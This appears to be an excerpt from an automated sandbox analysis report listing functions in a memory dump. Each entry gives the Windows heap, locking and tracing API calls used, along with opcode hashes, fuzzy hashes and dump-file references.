                                                                                                                            • Instruction ID: 0dfd86b1b5903d4c2076414207366e6be140d4780c0216556027471d10edd1d8
                                                                                                                            • Opcode Fuzzy Hash: 60371760827ea58bb9f7904789288bf24365a7fbd87bcfa4940f8fd97f1384ed
                                                                                                                            • Instruction Fuzzy Hash: 94F0AFB06497489FC310DF38C886A1BB7E4FF88754F40465AB898DB390E738E901CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B21927A, Relevance: 3.0, APIs: 2, Instructions: 32memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,00000098,?,0000000A,00000000,6B20504F,00000000,?,?,6B204E1B,0000000F,?,000000A0), ref: 6B219290
                                                                                                                            • memset.1105(00000000,00000000,00000098,?,00000008,00000098,?,0000000A,00000000,6B20504F,00000000,?,?,6B204E1B,0000000F,?), ref: 6B21929F
                                                                                                                              • Part of subcall function 6B2192C6: RtlAcquireSRWLockExclusive.1105(6B2C86AC,0000000C,00000000,00000000,00000000,?,6B2192C0,00000000,?,?,6B204E1B,0000000F,?,000000A0), ref: 6B2192D6
                                                                                                                              • Part of subcall function 6B2192C6: RtlRbInsertNodeEx.1105(6B2C86D4,?,00000000,00000000,6B2C86AC,0000000C,00000000,00000000,00000000), ref: 6B219301
                                                                                                                              • Part of subcall function 6B2192C6: RtlReleaseSRWLockExclusive.1105(6B2C86AC,6B2C86D4,?,00000000,00000000,6B2C86AC,0000000C,00000000,00000000,00000000), ref: 6B21930B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireAllocateHeapInsertNodeReleasememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3899015646-0
                                                                                                                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                            • Instruction ID: bd7c59e7909c03aa05ca7bf35938eddbe333b5e5e59a392ac0cce8a04f68c510
                                                                                                                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                            • Instruction Fuzzy Hash: 46E065322415446BE7118E55DCC5B5776ED9F82725F004079B6045E282C6E9D919C7A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A8D34, Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,?,?,6B242D82,?,?,?,00000000,?,00000000,?), ref: 6B2A8D55
                                                                                                                            • ZwTraceEvent.1105(?,00020402,00000008,?,?,?,?,?,?,?,?,?,6B242D82,?,?,?), ref: 6B2A8D82
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: b2cab59a15e9122ff33409ac9c41a348deaddff45d9cdbcd8af83d1d5d13f639
                                                                                                                            • Instruction ID: 33c2efd23bdbf052349dd12bf1ae256c6df3cbe15114346d0bfb4aec34da8d25
                                                                                                                            • Opcode Fuzzy Hash: b2cab59a15e9122ff33409ac9c41a348deaddff45d9cdbcd8af83d1d5d13f639
                                                                                                                            • Instruction Fuzzy Hash: 1FF0B470A4464CAFDB04DFB8D486A6E77F8EF18700F508099E905EB381DB38D901CB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A8C14, Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B2A8C35
                                                                                                                            • ZwTraceEvent.1105(?,00020402,00000008,?), ref: 6B2A8C62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: 01b87a8d81851352c93c0d168fab6ac42910e162e35c0e8e737656edb6585199
                                                                                                                            • Instruction ID: 7e155ddf0e07cd33b973184dafdd6adf67505d0eb7bb937ef22e53b79858c019
                                                                                                                            • Opcode Fuzzy Hash: 01b87a8d81851352c93c0d168fab6ac42910e162e35c0e8e737656edb6585199
                                                                                                                            • Instruction Fuzzy Hash: 2BF09070A8524CABDB08DBB8D946A6E73F8BB08300F404499A914EB281EB38D900CB44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A8C75, Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B2A8C96
                                                                                                                            • ZwTraceEvent.1105(?,00020402,00000008,?), ref: 6B2A8CC3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: 61f023c1558c78797f4cade9bd696d31548b9a96646c643f2508a34a8f88d23b
                                                                                                                            • Instruction ID: c8e08aedbd498dbc4ef4740ea41262c05bb927f8b636cc0bd55db6e7340ebc47
                                                                                                                            • Opcode Fuzzy Hash: 61f023c1558c78797f4cade9bd696d31548b9a96646c643f2508a34a8f88d23b
                                                                                                                            • Instruction Fuzzy Hash: 38F09070A5524CABDB04DFB8D946E6EB3F8BB48304F004099A904DB381EB38D900CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A8B58, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B2A8B76
                                                                                                                            • ZwTraceEvent.1105(?,00000402,00000004,?), ref: 6B2A8BA3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: 2d6739e1649ab27f6ec30db8405d837da5b047f1a5d33e692a64ac41aac73dfd
                                                                                                                            • Instruction ID: 914b83663eec59c7a5dbf16dc9923326422b5594aa277849fe3cbf73037a1214
                                                                                                                            • Opcode Fuzzy Hash: 2d6739e1649ab27f6ec30db8405d837da5b047f1a5d33e692a64ac41aac73dfd
                                                                                                                            • Instruction Fuzzy Hash: 53F05EB0A5525CABDB00DBB8D946E6E73F8AB08704F500499AA05DB3C1EB38D901C794
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B291BA8, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,?,?,?,?,6B292783,00000001), ref: 6B291BC6
                                                                                                                            • ZwTraceEvent.1105(?,00000402,00000004,?,?,?,?,?,?,?,?,?,?,?,6B292783,00000001), ref: 6B291BF3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: e933be48b38a75714dfc3b67c81f1f4793ec19a44b6ca9cb44b4d5fc92e83004
                                                                                                                            • Instruction ID: 52b7454d8106241623df2ee6bb512914c2c80b89e0d2476ee3c97967f64f93bd
                                                                                                                            • Opcode Fuzzy Hash: e933be48b38a75714dfc3b67c81f1f4793ec19a44b6ca9cb44b4d5fc92e83004
                                                                                                                            • Instruction Fuzzy Hash: 90F0E270A4524CABDB04DBBAD48AE9E77F8EF08704F000099E609EB380EA38D900C754
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A8BB6, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B2A8BD4
                                                                                                                            • ZwTraceEvent.1105(?,00020402,00000004,?), ref: 6B2A8C01
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: 5b488c06d72508213eed05be29652fd4ea1abd85e69d11c103649c5df93f1d52
                                                                                                                            • Instruction ID: 8ef7efceca63fe322fa14db2216b05d67fe589a663f834ee9c73eedc0a778644
                                                                                                                            • Opcode Fuzzy Hash: 5b488c06d72508213eed05be29652fd4ea1abd85e69d11c103649c5df93f1d52
                                                                                                                            • Instruction Fuzzy Hash: 7BF05EB0A5525CABDB04DBB8D946E6EB7F8EB08704F500499AA15DB2C1EB38D901C758
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2A8CD6, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,6B1FBB24,?,?,?), ref: 6B2A8CF4
                                                                                                                            • ZwTraceEvent.1105(?,00000402,000000E4,?,?,?,?,?,?,?,6B1FBB24,?,?,?), ref: 6B2A8D21
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentEventServiceSessionTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 171358211-0
                                                                                                                            • Opcode ID: 48036c60f76171ccf179b8ed02c16e04ec9e91b35c255097991c519d09477703
                                                                                                                            • Instruction ID: 4be9f6c73fec2a0b55581f2684ff5f7999248e1b3cea44846c34d8b5352bba48
                                                                                                                            • Opcode Fuzzy Hash: 48036c60f76171ccf179b8ed02c16e04ec9e91b35c255097991c519d09477703
                                                                                                                            • Instruction Fuzzy Hash: 26F0E270A4564CABCB00CBB8D886EAE77F8EF09304F100199E915EB3C0EB38D900C754
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B28D380, Relevance: 3.0, APIs: 2, Instructions: 21memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlpMuiRegFreeRegistryInfo.1105(00000000,00000FFF,00000000,?,6B239578,00000000), ref: 6B28D39B
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00000000,00000FFF,00000000,?,6B239578,00000000), ref: 6B28D3B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Free$HeapInfoRegistryRtlp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3599696081-0
                                                                                                                            • Opcode ID: 8ea5df5102da5e58f439f39d1c93f29629f88e1a76297067fb42f83d96e123dc
                                                                                                                            • Instruction ID: 93d2241b397963b1f3d7695ee4f6f90f094e047b96ecb433c42050bce6f408d9
                                                                                                                            • Opcode Fuzzy Hash: 8ea5df5102da5e58f439f39d1c93f29629f88e1a76297067fb42f83d96e123dc
                                                                                                                            • Instruction Fuzzy Hash: 38E0CD312C4248B7DF115E54CC01F597755DB407E5F104076FD045A6D0C6799D56DAC4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D23F6, Relevance: 3.0, APIs: 2, Instructions: 18memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwClose.1105(00000000,6B1D23E2,?,?,?,?,?,?,?,?,?,6B2AF350,0000004C), ref: 6B22F652
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,6B1D23E2,?,?,?,?,?,?,?,?,?,6B2AF350,0000004C), ref: 6B22F662
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1266433183-0
                                                                                                                            • Opcode ID: 1368422e5703f006b4c2e4099048bc17ff867176186ad6ff7dc972a6037ed35d
                                                                                                                            • Instruction ID: 16a31c98fd535d844860c0114d3b8aa18af1182369924bcce57582c5e435bb7d
                                                                                                                            • Opcode Fuzzy Hash: 1368422e5703f006b4c2e4099048bc17ff867176186ad6ff7dc972a6037ed35d
                                                                                                                            • Instruction Fuzzy Hash: C1E04631414449BACB129B64C984BAAB7B6FB48308F040058D130725B1CB7D6991DBD0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2553CA, Relevance: 3.0, APIs: 2, Instructions: 16memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlLeaveCriticalSection.1105(?,6B2553BA,?,?,?,?,?,?,?,?,?,?,?,6B2B05F0,00000080,6B245CA1), ref: 6B2553D9
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,6B2553BA,?,?,?,?,?,?,?,?,?,?,?,6B2B05F0), ref: 6B2553F3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalFreeHeapLeaveSection
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 681598451-0
                                                                                                                            • Opcode ID: a714b8595cd1ddaba1e7788f3521a58498cce96b12395a284aa87494bdbdc67f
                                                                                                                            • Instruction ID: 1dff51ee102f211a7b3f4102734d46ac93fc3e7fb1e8ed3498d640d193432582
                                                                                                                            • Opcode Fuzzy Hash: a714b8595cd1ddaba1e7788f3521a58498cce96b12395a284aa87494bdbdc67f
                                                                                                                            • Instruction Fuzzy Hash: 89E0EC72954A84ABCF02DB59C690F5EB7F9FB44B40F150454A5185B661C768ED11CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D3138, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B20174B: ZwFreeVirtualMemory.1105(000000FF,00000000,?,?,00000000,?,00000000,00000001,?,6B294827,00000000,00008000,?), ref: 6B201760
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000000,00008000,?,?,?,?,?,6B1D308B,00000000,00008000), ref: 6B1D3189
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentFreeMemoryServiceSessionVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 215549893-0
                                                                                                                            • Opcode ID: d4aeeff4ef93e10868052b9739ddbb58bbde280f33870a99f1aaca30df05f52d
                                                                                                                            • Instruction ID: c6ec91085132824f900ff2d0c231d90a57d7eab978cf418133773859b7c18ae5
                                                                                                                            • Opcode Fuzzy Hash: d4aeeff4ef93e10868052b9739ddbb58bbde280f33870a99f1aaca30df05f52d
                                                                                                                            • Instruction Fuzzy Hash: 2211D031A04309EFD725CF64D845F56B7F9EB86719F148599E8018B280EB79A803CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B29E962, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00008000,?,?,?,DDEEDDEE,?,?,?,6B29B5F7,?,?,?,00000000), ref: 6B29E9C3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1007659313-0
                                                                                                                            • Opcode ID: 4cd26bc2830512c8efe61bd487b81e34690bbdf952f6f3e231af462827596455
                                                                                                                            • Instruction ID: cb88c68b4c703d8e465948787b2679d08ac482bbafe425f62296935599d4ca53
                                                                                                                            • Opcode Fuzzy Hash: 4cd26bc2830512c8efe61bd487b81e34690bbdf952f6f3e231af462827596455
                                                                                                                            • Instruction Fuzzy Hash: 1C113432A10519AFDB09DB69C841AADB7F5FF84310F048269EC4997380DB35AD11CB80
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B264257, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B2641E8: RtlEnterCriticalSection.1105(?,6B2B08F0,00000008,6B26426A,6B2B08D0,00000008,6B209B80,?,?,?,?,6B1EED2D,-00000F38,6B2C84D8,6B2C84D8,6B2217F0), ref: 6B264206
                                                                                                                            • RtlEnterCriticalSection.1105(?,6B2B08D0,00000008,6B209B80,?,?,?,?,6B1EED2D,-00000F38,6B2C84D8,6B2C84D8,6B2217F0,00000000,?,6B1FF715), ref: 6B264273
                                                                                                                              • Part of subcall function 6B1D7055: RtlDebugPrintTimes.1105(00000001,?,6B2AFE98,?,00000000,00000000,7FFFFFFF,?,?,?,?,6B26430E,?,6B2B08D0,00000008,6B209B80), ref: 6B1D7086
                                                                                                                              • Part of subcall function 6B1D7055: RtlFreeHeap.1105(?,00000000,00000002,7FFFFFFF,?,?,?,?,6B26430E,?,6B2B08D0,00000008,6B209B80,?,?), ref: 6B1D70AB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalEnterSection$DebugFreeHeapPrintTimes
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4177879599-0
                                                                                                                            • Opcode ID: 0256681fe72624450cd4fa9916dcf4d3b0fa8e73c437672f847948187db538dc
                                                                                                                            • Instruction ID: d2ccb08aff971db6d02fa88c6852ba3208e0023dee926e3caeeb1e3c8159729a
                                                                                                                            • Opcode Fuzzy Hash: 0256681fe72624450cd4fa9916dcf4d3b0fa8e73c437672f847948187db538dc
                                                                                                                            • Instruction Fuzzy Hash: EE217775980649CFCB45DF25C0A9A14B7F1FB86399B30C2AAC1A88F290FB3DD581CB01
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B28F674, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlReAllocateHeap.1105(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000038,?,00000000,00000001,?,?), ref: 6B28F6EA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 2f1c757cedf2a34f8c3a8771d7a9ca5af71ece11ae23450c1976c7beb9d8c16e
                                                                                                                            • Instruction ID: c9641436d60beb452ec30fd91e6e5c364675c6a671b9737ab18932cee7cfc4c6
                                                                                                                            • Opcode Fuzzy Hash: 2f1c757cedf2a34f8c3a8771d7a9ca5af71ece11ae23450c1976c7beb9d8c16e
                                                                                                                            • Instruction Fuzzy Hash: 2511C83271011EBBDB04CB6AC985DAF77FEDF88668B01055DA915C7150DB74EE05CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E766D, Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,00000000,00000000,?,?,00000000,00000000,00000001,?,?,00000000,00000014,?,6B1DDC22,00000002), ref: 6B1E76CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                            • Instruction ID: 60be4adb35dda651effae2698eb483b6655b9cf97de150ccaf9e138176b1a300
                                                                                                                            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                            • Instruction Fuzzy Hash: B201B53230051ABBF710DE6ECC51E9B76ADEB88664B140125BA08CB251DB34CD4283B0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D31E0, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000001,00000000), ref: 6B22FE2B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
